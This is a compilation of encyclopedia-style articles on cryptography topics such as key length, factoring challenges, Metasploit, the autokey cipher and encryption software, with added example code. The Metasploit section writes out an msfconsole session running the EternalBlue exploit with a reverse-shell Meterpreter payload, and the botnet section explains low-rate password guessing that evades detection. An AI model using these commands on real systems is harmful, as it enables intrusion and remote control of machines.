A 256-bit Elliptic-curve Diffie–Hellman (ECDH) key has approximately the same safety factor as a 128-bit AES key.[12] A message encrypted with an elliptic key algorithm using a 109-bit long key was broken in 2004.[17] The NSA previously recommended 256-bit ECC for protecting classified information up to the SECRET level, and 384-bit for TOP SECRET;[10] in 2015 it announced plans to transition to quantum-resistant algorithms by 2024, and until then recommends 384-bit for all classified information.[18] The two best known quantum computing attacks are based on Shor's algorithm and Grover's algorithm. Of the two, Shor's offers the greater risk to current security systems. Derivatives of Shor's algorithm are widely conjectured to be effective against all mainstream public-key algorithms including RSA, Diffie-Hellman and elliptic curve cryptography. According to Professor Gilles Brassard, an expert in quantum computing: "The time needed to factor an RSA integer is the same order as the time needed to use that same integer as modulus for a single RSA encryption. In other words, it takes no more time to break RSA on a quantum computer (up to a multiplicative constant) than to use it legitimately on a classical computer." The general consensus is that these public key algorithms are insecure at any key size if sufficiently large quantum computers capable of running Shor's algorithm become available. The implication of this attack is that all data encrypted using current standards-based security systems such as the ubiquitous SSL used to protect e-commerce and Internet banking and SSH used to protect access to sensitive computing systems is at risk. Encrypted data protected using public-key algorithms can be archived and may be broken at a later time, commonly known as retroactive/retrospective decryption or "harvest now, decrypt later". Mainstream symmetric ciphers (such as AES or Twofish) and collision resistant hash functions (such as SHA) are widely conjectured to offer greater security against known quantum computing attacks. They are widely thought most vulnerable to Grover's algorithm. Bennett, Bernstein, Brassard, and Vazirani proved in 1996 that a brute-force key search on a quantum computer cannot be faster than roughly 2^(n/2) invocations of the underlying cryptographic algorithm, compared with roughly 2^n in the classical case.[19] Thus in the presence of large quantum computers an n-bit key can provide at least n/2 bits of security. Quantum brute force is easily defeated by doubling the key length, which has little extra computational cost in ordinary use. This implies that at least a 256-bit symmetric key is required to achieve a 128-bit security rating against a quantum computer. As mentioned above, the NSA announced in 2015 that it plans to transition to quantum-resistant algorithms.[10] In a 2016 Quantum Computing FAQ, the NSA affirmed: "A sufficiently large quantum computer, if built, would be capable of undermining all widely-deployed public key algorithms used for key establishment and digital signatures. [...] It is generally accepted that quantum computing techniques are much less effective against symmetric algorithms than against current widely used public key algorithms. While public key cryptography requires changes in the fundamental design to protect against a potential future quantum computer, symmetric key algorithms are believed to be secure provided a sufficiently large key size is used. [...]
The public-key algorithms (RSA, Diffie-Hellman, [Elliptic-curve Diffie–Hellman] ECDH, and [Elliptic Curve Digital Signature Algorithm] ECDSA) are all vulnerable to attack by a sufficiently large quantum computer. [...] While a number of interesting quantum resistant public key algorithms have been proposed external to NSA, nothing has been standardized by NIST, and NSA is not specifying any commercial quantum resistant standards at this time. NSA expects that NIST will play a leading role in the effort to develop a widely accepted, standardized set of quantum resistant algorithms. [...] Given the level of interest in the cryptographic community, we hope that there will be quantum resistant algorithms widely available in the next decade. [...] The AES-256 and SHA-384 algorithms are symmetric, and believed to be safe from attack by a large quantum computer."[20] In a 2022 press release, the NSA notified: "A cryptanalytically-relevant quantum computer (CRQC) would have the potential to break public-key systems (sometimes referred to as asymmetric cryptography) that are used today. Given foreign pursuits in quantum computing, now is the time to plan, prepare and budget for a transition to [quantum-resistant] QR algorithms to assure sustained protection of [National Security Systems] NSS and related assets in the event a CRQC becomes an achievable reality."[21] Since September 2022, the NSA has been transitioning from the Commercial National Security Algorithm Suite (now referred to as CNSA 1.0), originally launched in January 2016, to the Commercial National Security Algorithm Suite 2.0 (CNSA 2.0).[22][b]
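To make the exponential scaling described above concrete, the following Python sketch estimates brute-force search times for several key lengths. The guess rate of 10^12 keys per second is an arbitrary assumption for illustration, and the "Grover" column simply halves the effective bit count, as the text explains.

    import math

    def brute_force_years(bits, guesses_per_second=1e12):
        # 2^bits keys at an assumed guess rate; the rate is illustrative only.
        seconds = 2 ** bits / guesses_per_second
        return seconds / (60 * 60 * 24 * 365)

    for bits in (56, 80, 112, 128, 256):
        classical = brute_force_years(bits)
        quantum = brute_force_years(bits / 2)   # Grover: ~2^(n/2) work
        print(f"{bits:3d}-bit key: ~{classical:.2e} years classical, "
              f"~{quantum:.2e} years with Grover")

The output makes the qualitative point of the article: a 56-bit key falls in hours at this rate, while a 256-bit key remains out of reach even if Grover's algorithm halves its effective strength.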
https://en.wikipedia.org/wiki/Cryptographic_key_length
Distributed.net is a volunteer computing effort that is attempting to solve large-scale problems using otherwise idle CPU or GPU time. It is governed by Distributed Computing Technologies, Incorporated (DCTI), a non-profit organization under U.S. tax code 501(c)(3). Distributed.net is working on RC5-72 (breaking RC5 with a 72-bit key).[1] The RC5-72 project is on pace to exhaust the keyspace in just under 37 years as of January 2025,[2] although the project will end whenever the required key is found. RC5 has eight unsolved challenges from RSA Security, although in May 2007, RSA Security announced[3] that they would no longer be providing prize money for a correct key to any of their secret key challenges. distributed.net has decided to sponsor the original prize offer for finding the key as a result.[4] In 2001, distributed.net was estimated to have a throughput of over 30 TFLOPS.[5] As of August 2019, the throughput was estimated to be the same as a Cray XC40, as used in the Lonestar 5 supercomputer,[6] or around 1.25 petaFLOPS.[7] A coordinated effort was started in February 1997 by Earle Ady and Christopher G. Stach II of Hotjobs.com and New Media Labs, as an effort to break the RC5-56 portion of the RSA Secret-Key Challenge, a 56-bit encryption algorithm that had a $10,000 USD prize available to anyone who could find the key. Unfortunately, this initial effort had to be suspended as the result of SYN flood attacks by participants upon the server.[8] A new independent effort, named distributed.net, was coordinated by Jeffrey A. Lawson, Adam L. Beberg, and David C. McNett along with several others who would serve on the board and operate infrastructure. By late March 1997 new proxies were released to resume RC5-56 and work began on enhanced clients. A cow's head was selected as the icon of the application and the project's mascot.[9] The RC5-56 challenge was solved on October 19, 1997, after 250 days. The correct key was "0x532B744CC20999" and the plaintext message read "The unknown message is: It's time to move to a longer key length".[10] The RC5-64 challenge was solved on July 14, 2002, after 1,757 days. The correct key was "0x63DE7DC154F4D039" and the plaintext message read "The unknown message is: Some things are better left unread".[10] The searches for Optimal Golomb Rulers (OGRs) of order 24, 25, 26, 27 and 28 were completed by distributed.net on 13 October 2004, 25 October 2008, 24 February 2009, 19 February 2014, and 23 November 2022 respectively.[11][12][13][14][15] "DNETC" is the file name of the software application which users run to participate in any active distributed.net project. It is a command-line program with an interface to configure it, available for a wide variety of platforms.[16] distributed.net refers to the software application simply as the "client". As of April 2019, volunteers running 32-bit Windows with AMD FireStream-enabled GPUs have contributed the most processing power to the RC5-72 project[17] and volunteers running 64-bit Linux have contributed the most processing power to the OGR-28 project.[18] Portions of the source code for the client are publicly available, although users are not permitted to distribute modified versions themselves.[19] Distributed.net's RC5-72 project is available on the BOINC client through the Moo! Wrapper.[20] In recent years, most of the work on the RC5-72 project has been submitted by clients that run on the GPU of modern graphics cards.
Although the project had already been underway for almost 6 years when the first GPUs began submitting results, as of January 2025, GPUs represent 88% of all completed work units[22] and complete more than 95% of all work units each day.[21]
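As a back-of-envelope check on the keyspace figures above, the following Python sketch relates the 2^72-key RC5-72 keyspace to an assumed aggregate search rate. The rate shown is chosen only to reproduce a roughly 37-year exhaustion time; it is not a published distributed.net statistic.

    keys_total = 2 ** 72                      # full RC5-72 keyspace
    keys_per_second = 4.1e12                  # assumed aggregate rate, illustrative only
    seconds_per_year = 60 * 60 * 24 * 365
    years = keys_total / keys_per_second / seconds_per_year
    print(f"~{years:.1f} years to exhaust the keyspace")   # ~36.5 years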
https://en.wikipedia.org/wiki/Distributed.net
The Hail Mary Cloud was, or is, a password-guessing botnet, which used a statistical equivalent to brute-force password guessing. The botnet ran from possibly as early as 2005,[1] and certainly from 2007 until 2012 and possibly later. The botnet was named and documented by Peter N. M. Hansteen.[2] The principle is that a botnet can try several thousand of the more likely passwords against thousands of hosts, rather than millions of passwords against one host. Since the attacks were widely distributed, the frequency on a given server was low and was unlikely to trigger alarms.[2] Moreover, the attacks came from different members of the botnet, thus decreasing the effectiveness of both IP-based detection and blocking.
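The arithmetic behind this "wide and slow" strategy can be sketched in a few lines of Python. Every number below is invented for illustration, but it shows why the per-host guess rate stays below typical lockout and alerting thresholds.

    passwords = 5_000        # shortlist of likely passwords (assumed)
    hosts = 20_000           # servers probed by the botnet (assumed)
    bots = 2_000             # compromised machines doing the guessing (assumed)
    days = 180               # length of the campaign (assumed)

    per_host_per_day = passwords / days                  # ~28 guesses/host/day
    per_bot_per_day = passwords * hosts / bots / days    # ~278 guesses/bot/day
    print(f"{per_host_per_day:.0f} guesses per host per day")
    print(f"{per_bot_per_day:.0f} guesses per bot per day")

Roughly 28 guesses per host per day, arriving from thousands of different source addresses, is far below the rates that trigger account lockouts or intrusion alarms tuned for single-source brute force.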
https://en.wikipedia.org/wiki/Hail_Mary_Cloud
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7. Its best-known sub-project is the open-source[3] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. The Metasploit Project includes anti-forensic and evasion tools, some of which are built into the Metasploit Framework. It comes pre-installed on various security-oriented operating systems. Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced[4] that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions. Like comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added an open-core proprietary edition called Metasploit Pro.[5] Metasploit's emerging position as the de facto exploit development framework[6] led to the release of software vulnerability advisories often accompanied[7] by a third-party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug.[8][9] Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. The basic steps for exploiting a system using the Framework include optionally checking whether the intended target is vulnerable, choosing and configuring an exploit and a payload, selecting an encoding technique to evade defenses such as intrusion detection systems, and executing the exploit. This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers. Metasploit runs on Unix (including Linux and macOS) and on Windows. The Metasploit Framework can be extended to use add-ons in multiple languages. To choose an exploit and payload, some information about the target system is needed, such as operating system version and installed network services. This information can be gleaned with port scanning and TCP/IP stack fingerprinting tools such as Nmap. Vulnerability scanners such as Nessus and OpenVAS can detect target system vulnerabilities. Metasploit can import vulnerability scanner data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.[10] There are several interfaces for Metasploit available. The most popular are maintained by Rapid7 and Strategic Cyber LLC.[11] The Metasploit Framework is the freely available, open-source edition of the Metasploit Project. It provides tools for vulnerability assessment and exploit development. The Metasploit Framework is implemented in Ruby and uses a modular software architecture.[12] In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers.
Metasploit Pro adds onto Metasploit Express with features such as Quick Start Wizards/MetaModules, building and managing social engineering campaigns, web application testing, an advanced Pro Console, dynamic payloads for anti-virus evasion, integration with Nexpose for ad-hoc vulnerability scans, and VPN pivoting. The Community edition was released in October 2011, and included a free, web-based user interface for Metasploit. Metasploit Community Edition was based on the commercial functionality of the paid-for editions with a reduced set of features, including network discovery, module browsing and manual exploitation. Metasploit Community was included in the main installer. On July 18, 2019, Rapid7 announced the end-of-sale of Metasploit Community Edition.[13] Existing users were able to continue using it until their license expired. The Express edition was released in April 2010 as an open-core commercial edition for security teams who need to verify vulnerabilities. It offered a graphical user interface, integrated Nmap for discovery, and added smart brute-forcing as well as automated evidence collection. On June 4, 2019, Rapid7 discontinued Metasploit Express Edition.[14] Armitage is a graphical cyber-attack management tool for the Metasploit Project that visualizes targets and recommends exploits. It is a free and open source network security tool notable for its contributions to red team collaboration allowing for shared sessions, data, and communication through a single Metasploit instance.[15] The latest release of Armitage was in 2015. Cobalt Strike is a collection of threat emulation tools provided by HelpSystems to work with the Metasploit Framework.[16] Cobalt Strike includes all features of Armitage and adds post-exploitation tools, in addition to report generation features.[17] Metasploit currently has over 2074 exploits, organized under the following platforms: AIX, Android, BSD, BSDi, Cisco, Firefox, FreeBSD, HP-UX, Irix, Java, JavaScript, Linux, mainframe, multi (applicable to multiple platforms), NetBSD, NetWare, NodeJS, OpenBSD, macOS, PHP, Python, R, Ruby, Solaris, Unix, and Windows. Note that Apple iOS is based on FreeBSD, and some FreeBSD exploits may work, while most won't. Metasploit currently has over 592 payloads, including command shells and Meterpreter sessions. The Metasploit Framework includes hundreds of auxiliary modules that can perform scanning, fuzzing, sniffing, and much more. There are three types of auxiliary modules, namely scanner, admin and server modules. Metasploit Framework operates as an open-source project and accepts contributions from the community through GitHub.com pull requests.[18] Submissions are reviewed by a team consisting of both Rapid7 employees and senior external contributors. The majority of contributions add new modules, such as exploits or scanners.[19] List of original developers:
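As a hedged illustration of the modular exploit/payload workflow described earlier, a typical msfconsole session pairs an exploit module with a payload and per-target options. The module shown below (the well-known MS17-010 EternalBlue exploit) is real, but the addresses are example values, and the exact prompts vary between Framework versions.

    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.0.2.10
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.0.2.1
    msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Because the exploit and the payload are independent modules, the same exploit could instead be paired with, say, a simple command shell payload by changing only the PAYLOAD option.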
https://en.wikipedia.org/wiki/Metasploit_Project
TWINKLE (The Weizmann Institute Key Locating Engine) is a hypothetical integer factorization device described in 1999 by Adi Shamir[1] and purported to be capable of factoring 512-bit integers.[2] The name is also a pun on the twinkling LEDs used in the device. Shamir estimated that the cost of TWINKLE could be as low as $5000 per unit with bulk production. TWINKLE has a successor named TWIRL,[3] which is more efficient. The goal of TWINKLE is to implement the sieving step of the Number Field Sieve algorithm, which is the fastest known algorithm for factoring large integers. The sieving step, at least for 512-bit and larger integers, is the most time-consuming step of NFS. It involves testing a large set of numbers for B-'smoothness', i.e., absence of a prime factor greater than a specified bound B. What is remarkable about TWINKLE is that it is not a purely digital device. It gets its efficiency by eschewing binary arithmetic for an "optical" adder which can add hundreds of thousands of quantities in a single clock cycle. The key idea used is "time-space inversion". Conventional NFS sieving is carried out one prime at a time. For each prime, all the numbers to be tested for smoothness in the range under consideration which are divisible by that prime have their counter incremented by the logarithm of the prime (similar to the sieve of Eratosthenes). TWINKLE, on the other hand, works one candidate smooth number (call it X) at a time. There is one LED corresponding to each prime smaller than B. At the time instant corresponding to X, the set of LEDs glowing corresponds to the set of primes that divide X. This can be accomplished by having the LED associated with the prime p glow once every p time instants. Further, the intensity of each LED is proportional to the logarithm of the corresponding prime. Thus, the total intensity equals the sum of the logarithms of all the prime factors of X smaller than B. This intensity is equal to the logarithm of X if and only if X is B-smooth. Even in PC-based implementations, it is a common optimization to speed up sieving by adding approximate logarithms of small primes together. Similarly, TWINKLE has much room for error in its light measurements; as long as the intensity is at about the right level, the number is very likely to be smooth enough for the purposes of known factoring algorithms. The existence of even one large factor would imply that the logarithm of a large number is missing, resulting in a very low intensity; because most numbers have this property, the device's output would tend to consist of stretches of low-intensity output with brief bursts of high-intensity output. In the above it is assumed that X is square-free, i.e. it is not divisible by the square of any prime. This is acceptable since the factoring algorithms only require "sufficiently many" smooth numbers, and the "yield" decreases only by a small constant factor due to the square-freeness assumption. There is also the problem of false positives due to the inaccuracy of the optoelectronic hardware, but this is easily solved by adding a PC-based post-processing step for verifying the smoothness of the numbers identified by TWINKLE.
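The time-space inversion described above can be mimicked in software: instead of sieving prime by prime, test one candidate at a time by summing the logarithms of the small primes that divide it, exactly as the summed LED intensities do. The following Python sketch is illustrative only; the function names and the tolerance value are assumptions, and each prime is counted once, mirroring the square-free assumption in the text.

    import math

    def small_primes(bound):
        # Sieve of Eratosthenes up to the smoothness bound B.
        sieve = [True] * (bound + 1)
        sieve[0:2] = [False, False]
        for i in range(2, int(bound ** 0.5) + 1):
            if sieve[i]:
                sieve[i*i::i] = [False] * len(sieve[i*i::i])
        return [p for p, is_p in enumerate(sieve) if is_p]

    def looks_smooth(x, primes, tolerance=0.5):
        # Each "LED" contributes log(p) whenever p divides x; the total
        # matches log(x) only when x is square-free and B-smooth.
        intensity = sum(math.log(p) for p in primes if x % p == 0)
        return intensity >= math.log(x) - tolerance

    primes = small_primes(100)          # smoothness bound B = 100
    candidates = [x for x in range(2, 10_000) if looks_smooth(x, primes)]

As in the hardware, borderline hits would still be verified exactly in a post-processing step; the summed-logarithm test only has to be approximately right.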
https://en.wikipedia.org/wiki/TWINKLE
In cryptography and number theory, TWIRL (The Weizmann Institute Relation Locator) is a hypothetical hardware device designed to speed up the sieving step of the general number field sieve integer factorization algorithm.[1] During the sieving step, the algorithm searches for numbers with a certain mathematical relationship. In distributed factoring projects, this is the step that is parallelized to a large number of processors. TWIRL is still a hypothetical device — no implementation has been publicly reported. However, its designers, Adi Shamir and Eran Tromer, estimate that if TWIRL were built, it would be able to factor 1024-bit numbers in one year at the cost of "a few dozen million US dollars". TWIRL could therefore have enormous repercussions in cryptography and computer security — many high-security systems still use 1024-bit RSA keys, which TWIRL would be able to break in a reasonable amount of time and for reasonable costs. The security of some important cryptographic algorithms, notably RSA and the Blum Blum Shub pseudorandom number generator, rests on the difficulty of factorizing large integers. If factorizing large integers becomes easier, users of these algorithms will have to resort to using larger keys (computationally more expensive) or to using different algorithms, whose security rests on some other computationally hard problem (like the discrete logarithm problem).
https://en.wikipedia.org/wiki/TWIRL
The RSA Factoring Challenge was a challenge put forward by RSA Laboratories on March 18, 1991[1] to encourage research into computational number theory and the practical difficulty of factoring large integers and cracking RSA keys used in cryptography. They published a list of semiprimes (numbers with exactly two prime factors) known as the RSA numbers, with a cash prize for the successful factorization of some of them. The smallest of them, a 100-decimal-digit number called RSA-100, was factored by April 1, 1991. Many of the bigger numbers have still not been factored and are expected to remain unfactored for quite some time; however, advances in quantum computers make this prediction uncertain due to Shor's algorithm. In 2001, RSA Laboratories expanded the factoring challenge and offered prizes ranging from $10,000 to $200,000 for factoring numbers from 576 bits up to 2048 bits.[2][3][4] The RSA Factoring Challenges ended in 2007.[5] RSA Laboratories stated: "Now that the industry has a considerably more advanced understanding of the cryptanalytic strength of common symmetric-key and public-key algorithms, these challenges are no longer active."[6] When the challenge ended in 2007, only RSA-576 and RSA-640 had been factored from the 2001 challenge numbers.[7] The factoring challenge was intended to track the cutting edge in integer factorization. A primary application is for choosing the key length of the RSA public-key encryption scheme. Progress in this challenge should give an insight into which key sizes are still safe and for how long. As RSA Laboratories is a provider of RSA-based products, the challenge was used by them as an incentive for the academic community to attack the core of their solutions — in order to prove its strength. The RSA numbers were generated on a computer with no network connection of any kind. The computer's hard drive was subsequently destroyed so that no record would exist, anywhere, of the solution to the factoring challenge.[6] The first RSA numbers generated, RSA-100 to RSA-500 and RSA-617, were labeled according to their number of decimal digits; the other RSA numbers (beginning with RSA-576) were generated later and labelled according to their number of binary digits. The numbers in the table below are listed in increasing order despite this shift from decimal to binary. RSA Laboratories states that: for each RSA number n, there exist prime numbers p and q such that n = p × q. The problem is to find these two primes, given only n. The following table gives an overview over all RSA numbers. Note that the RSA Factoring Challenge ended in 2007[5] and no further prizes will be awarded for factoring the higher numbers.
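The statement of the problem is easy to express in code; what the challenge probed is how the cost of solving it grows with size. The Python sketch below factors a toy semiprime by trial division (the numbers are made up for illustration). The same loop is hopeless against a 1024-bit challenge number, since its running time grows exponentially with the bit length of n.

    def factor_semiprime(n):
        """Return (p, q) with p * q == n, by naive trial division."""
        if n % 2 == 0:
            return 2, n // 2
        f = 3
        while f * f <= n:
            if n % f == 0:
                return f, n // f
            f += 2
        raise ValueError("n is prime")

    p, q = factor_semiprime(100_160_063)   # toy 27-bit semiprime: 10007 * 10009
    assert p * q == 100_160_063

Trial division takes on the order of sqrt(n) steps, so each additional bit of key length roughly multiplies the work by sqrt(2); the challenge numbers were designed to measure how much better real algorithms such as the number field sieve do in practice.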
https://en.wikipedia.org/wiki/RSA_Factoring_Challenge
An autokey cipher (also known as the autoclave cipher) is a cipher that incorporates the message (the plaintext) into the key. The key is generated from the message in some automated fashion, sometimes by selecting certain letters from the text or, more commonly, by adding a short primer key to the front of the message. There are two forms of autokey cipher: key-autokey and text-autokey ciphers. A key-autokey cipher uses previous members of the keystream to determine the next element in the keystream. A text-autokey uses the previous message text to determine the next element in the keystream. This cipher was invented in 1586 by Blaise de Vigenère with a reciprocal table of ten alphabets. Vigenère's version used an agreed-upon letter of the alphabet as a primer, making the key by writing down that letter and then the rest of the message.[1] More popular autokeys use a tabula recta, a square with 26 copies of the alphabet, the first line starting with 'A', the next line starting with 'B' etc. Instead of a single letter, a short agreed-upon keyword is used, and the key is generated by writing down the primer and then the rest of the message, as in Vigenère's version. To encrypt a plaintext, the row with the first letter of the message and the column with the first letter of the key are located. The letter where the row and the column cross is the ciphertext letter. The autokey cipher, as used by members of the American Cryptogram Association, starts with a relatively short keyword, the primer, and appends the message to it. For example, if the keyword is QUEENLY and the message is attack at dawn, then the key would be QUEENLYATTACKATDAWN.[2] The ciphertext message would thus be "QNXEPVYTWTWP". To decrypt the message, the recipient would start by writing down the agreed-upon keyword. The first letter of the key, Q, would then be taken, and that row would be found in a tabula recta. That row would be searched for the first letter of the ciphertext, also Q in this case, and the letter at the top of that column, A, would be retrieved. Now, that letter would be added to the end of the key: Then, since the next letter in the key is U and the next letter in the ciphertext is N, the U row is looked across to find the N to retrieve T: That continues until the entire key is reconstructed, when the primer can be removed from the start. With Vigenère's autokey cipher, a single mistake in encryption renders the rest of the message unintelligible.[3] Autokey ciphers are somewhat more secure than polyalphabetic ciphers that use fixed keys since the key does not repeat within a single message. Therefore, methods like the Kasiski examination or index of coincidence analysis will not work on the ciphertext, unlike for similar ciphers that use a single repeated key.[3] A crucial weakness of the system, however, is that the plaintext is part of the key. That means that the key will likely contain common words at various points. The key can be attacked by using a dictionary of common words, bigrams, trigrams etc. and by attempting the decryption of the message by moving each candidate word through the key until potentially readable text appears. Consider an example message meet at the fountain encrypted with the primer keyword KILT:[4] To start, the autokey would be constructed by placing the primer at the front of the message: The message is then encrypted by using the key and the substitution alphabets, here a tabula recta: The attacker receives only the ciphertext and can attack the text by selecting a word that is likely to appear in the plaintext.
In this example, the attacker selects the word the as a potential part of the original message and then attempts to decode it by placing THE at every possible location in the key: In each case, the resulting plaintext appears almost random because the key is not aligned for most of the ciphertext. However, examining the results can suggest locations of the key being properly aligned. In those cases, the resulting decrypted text is potentially part of a word. In this example, it is highly unlikely that dfl is the start of the original plaintext and so it is highly unlikely either that the first three letters of the key are THE. Examining the results, a number of fragments that are possibly words can be seen and others can be eliminated. Then, the plaintext fragments can be sorted in their order of likelihood: A correct plaintext fragment is also going to appear in the key, shifted right by the length of the keyword. Similarly, the guessed key fragment (THE) also appears in the plaintext shifted left. Thus, by guessing keyword lengths (probably between 3 and 12), more plaintext and key can be revealed. Trying that with oun, possibly after wasting some time with the others, results in the following: A shift of 4 can be seen to look good (both of the others have unlikely Qs either in the plaintext or in the keyword). A lot can be worked with now. The keyword is probably 4 characters long (K.LT), and some of the message is visible: Because the plaintext guesses have an effect on the key 4 characters to the left, feedback on correct and incorrect guesses is given. The gaps can quickly be filled in, giving both the plaintext and the keyword: The ease of cryptanalysis is caused by the feedback from the relationship between plaintext and key. A three-character guess reveals six more characters (three on each side), which then reveal further characters, creating a cascade effect. That allows incorrect guesses to be ruled out quickly.
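A text-autokey of the kind described above is short to implement. The following Python sketch reproduces the QUEENLY/attack at dawn example from the text; the function names are, of course, illustrative.

    def autokey_encrypt(plaintext, primer):
        # The key is the primer followed by the plaintext itself.
        key = primer + plaintext
        return "".join(chr((ord(p) + ord(k) - 2 * ord("A")) % 26 + ord("A"))
                       for p, k in zip(plaintext, key))

    def autokey_decrypt(ciphertext, primer):
        key, out = list(primer), []
        for i, c in enumerate(ciphertext):
            p = chr((ord(c) - ord(key[i])) % 26 + ord("A"))
            out.append(p)
            key.append(p)          # each recovered letter extends the key
        return "".join(out)

    assert autokey_encrypt("ATTACKATDAWN", "QUEENLY") == "QNXEPVYTWTWP"
    assert autokey_decrypt("QNXEPVYTWTWP", "QUEENLY") == "ATTACKATDAWN"

The decryption loop makes the cascade effect of the attack concrete: every plaintext letter recovered immediately becomes key material for a later position, which is exactly the feedback the crib-dragging method exploits.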
https://en.wikipedia.org/wiki/Autokey_cipher
Cover-coding is a technique for obscuring the data that is transmitted over an insecure link, to reduce the risks of snooping. An example of cover-coding would be for the sender to perform a bitwise XOR (exclusive OR) of the original data with a password or random number which is known to both sender and receiver. The resulting cover-coded data is then transmitted from sender to the receiver, who uncovers the original data by performing a further bitwise XOR operation on the received data using the same password or random number. ISO 18000-6C (EPC Class 1 Generation 2) RFID tags protect some operations with a cover code. The reader requests a random number from the tag, and the tag responds with a new random number. The reader then covers subsequent communications by XORing the data it sends with this number. Cover coding is secure only if the tag signal cannot be intercepted and the random number is not re-used. Compared to the loud transmissions from the reader, tag backscatter is much weaker and difficult – but not impossible – to intercept.[1][2][3]
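A minimal sketch of XOR cover-coding in Python, assuming a 16-bit random number as in the Gen 2 handshake described above; the variable names and values are illustrative and not taken from the ISO 18000-6C specification.

    def cover(data: int, key: int) -> int:
        return data ^ key          # sender covers the payload

    def uncover(covered: int, key: int) -> int:
        return covered ^ key       # receiver applies the same XOR to recover it

    rn16 = 0x3A7C                  # random number supplied by the tag (example value)
    payload = 0x1234               # data the reader wants to send (example value)
    sent = cover(payload, rn16)
    assert uncover(sent, rn16) == payload

Because XOR is its own inverse, the same operation both covers and uncovers the data; the scheme's security therefore rests entirely on the random number staying fresh and unobserved, as the text notes.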
https://en.wikipedia.org/wiki/Cover-coding
Encryption software is software that uses cryptography to prevent unauthorized access to digital information.[1][2] Cryptography is used to protect digital information on computers as well as the digital information that is sent to other computers over the Internet.[3] There are many software products which provide encryption. Software encryption uses a cipher to obscure the content into ciphertext. One way to classify this type of software is by the type of cipher used. Ciphers can be divided into two categories: public key ciphers (also known as asymmetric ciphers), and symmetric key ciphers.[4] Encryption software can be based on either public key or symmetric key encryption. Another way to classify software encryption is to categorize its purpose. Using this approach, software encryption may be classified into software which encrypts "data in transit" and software which encrypts "data at rest". Data in transit generally uses public key ciphers, and data at rest generally uses symmetric key ciphers. Symmetric key ciphers can be further divided into stream ciphers and block ciphers. Stream ciphers typically encrypt plaintext a bit or byte at a time, and are most commonly used to encrypt real-time communications, such as audio and video information. The key is used to establish the initial state of a keystream generator, and the output of that generator is used to encrypt the plaintext. Block cipher algorithms split the plaintext into fixed-size blocks and encrypt one block at a time. For example, AES processes 16-byte blocks, while its predecessor DES encrypted blocks of eight bytes. There is also a well-known case where public key infrastructure is used to protect the transfer of data at rest, discussed further below. Data in transit is data that is being sent over a computer network. When the data is between two endpoints, any confidential information may be vulnerable. The payload (confidential information) can be encrypted to secure its confidentiality, as well as its integrity and validity.[5] Often, the data in transit is between two entities that do not know each other - such as in the case of visiting a website. To establish a relationship and securely share an encryption key to secure the information that will be exchanged, a set of roles, policies, and procedures has been developed to accomplish this; it is known as the public key infrastructure, or PKI. Once PKI has established a secure connection, a symmetric key can be shared between endpoints. A symmetric key is preferred over the private and public keys as a symmetric cipher is much more efficient (uses fewer CPU cycles) than an asymmetric cipher.[6][7] There are several methods for encrypting data in transit, such as IPsec, SCP, SFTP, SSH, OpenPGP and HTTPS. Data at rest refers to data that has been saved to persistent storage. Data at rest is generally encrypted by a symmetric key. Encryption may be applied at different layers in the storage stack. For example, encryption can be configured at the disk layer, on a subset of a disk called a partition, on a volume, which is a combination of disks or partitions, at the layer of a file system, or within user space applications such as database or other applications that run on the host operating system.
With full disk encryption, the entire disk is encrypted (except for the bits necessary to boot or access the disk when not using an unencrypted boot/preboot partition).[8] As disks can be partitioned into multiple partitions, partition encryption can be used to encrypt individual disk partitions.[9] Volumes, created by combining two or more partitions, can be encrypted using volume encryption.[10] File systems, also composed of one or more partitions, can be encrypted using filesystem-level encryption. Directories are referred to as encrypted when the files within the directory are encrypted.[11][12] File encryption encrypts a single file. Database encryption acts on the data to be stored, accepting unencrypted information and writing that information to persistent storage only after it has encrypted the data. Device-level encryption, a somewhat vague term that includes encryption-capable tape drives, can be used to offload the encryption tasks from the CPU. When there is a need to securely transmit data at rest, without the ability to create a secure connection, user space tools have been developed that support this need. These tools rely upon the receiver publishing their public key, and the sender being able to obtain that public key. The sender is then able to create a symmetric key to encrypt the information, and then use the receiver's public key to securely protect the transmission of the information and the symmetric key. This allows secure transmission of information from one party to another. The performance of encryption software is measured relative to the speed of the CPU. Thus, cycles per byte (sometimes abbreviated cpb), a unit indicating the number of clock cycles a microprocessor will need per byte of data processed, is the usual unit of measurement.[13] Cycles per byte serve as a partial indicator of real-world performance in cryptographic functions.[14] Applications may offer their own encryption, called native encryption; these include database applications such as Microsoft SQL Server, Oracle, and MongoDB, and they commonly rely on direct usage of CPU cycles for performance. This often impacts the desirability of encryption in businesses seeking greater security and ease of satisfying compliance, by affecting the speed and scale at which data moves within organizations and on to their partners.[15]
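The hybrid pattern described in the preceding paragraph (wrapping a fresh symmetric key under the receiver's public key, then encrypting the bulk data with that symmetric key) can be sketched with the third-party Python cryptography package. The choice of library, and of RSA-OAEP plus Fernet in particular, is an assumption made for illustration; the original text names no specific tools.

    from cryptography.hazmat.primitives.asymmetric import rsa, padding
    from cryptography.hazmat.primitives import hashes
    from cryptography.fernet import Fernet

    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)

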